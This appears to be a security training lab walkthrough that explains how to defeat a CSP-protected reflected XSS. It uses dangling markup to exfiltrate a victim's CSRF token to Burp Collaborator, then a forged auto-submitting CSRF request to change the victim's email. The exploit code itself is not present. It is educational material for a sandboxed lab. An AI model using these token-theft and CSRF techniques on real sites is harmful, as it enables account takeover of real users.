Lab: Reflected XSS protected by CSP, with dangling markup attack
You can log in to your own account using the following credentials:
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server (
- Log in to the lab using the account provided above.
Examine the "Update email" function. Observe that there is an XSS vulnerability in the
- Go to the Burp menu and launch the Burp Collaborator client.
- Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
Back in the lab, go to the exploit server and add the following code, replacing
your-lab-idwith your lab ID, and replacing
your-collaborator-idwith the payload that you just copied from Burp Collaborator.
- Click "Store" and then "Deliver exploit to victim". If the target user visits the website containing this malicious script while they are still logged in to the lab website, their browser will send a request containing their CSRF token to your malicious website. You can then steal this token using the Burp Collaborator client.
- Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see an HTTP interaction that was initiated by the application. Select the HTTP interaction, go to the "Request" tab, and copy the user's CSRF token.
- With Burp's intercept feature switched on, go back to the update email function of the lab and submit a request to change the email to any random address.
In Burp, go to the intercepted request and change the value of the email parameter to
- Right-click on the request and, from the context menu, select "Engagement tools" and then "Generate CSRF PoC". The popup shows both the request and the CSRF HTML that is generated by it. In the request, replace the CSRF token with the one that you stole from the victim earlier.
- Click "Options" and make sure that the "Include auto-submit script" is activated.
- Click "Regenerate" to update the CSRF HTML so that it contains the stolen token, then click "Copy HTML" to save it to your clipboard.
- Drop the request and switch off the intercept feature.
- Go back to the exploit server and paste the CSRF HTML into the body. You can overwrite the script that we entered earlier.
Click "Store" and "Deliver exploit to victim". The user's email will be changed to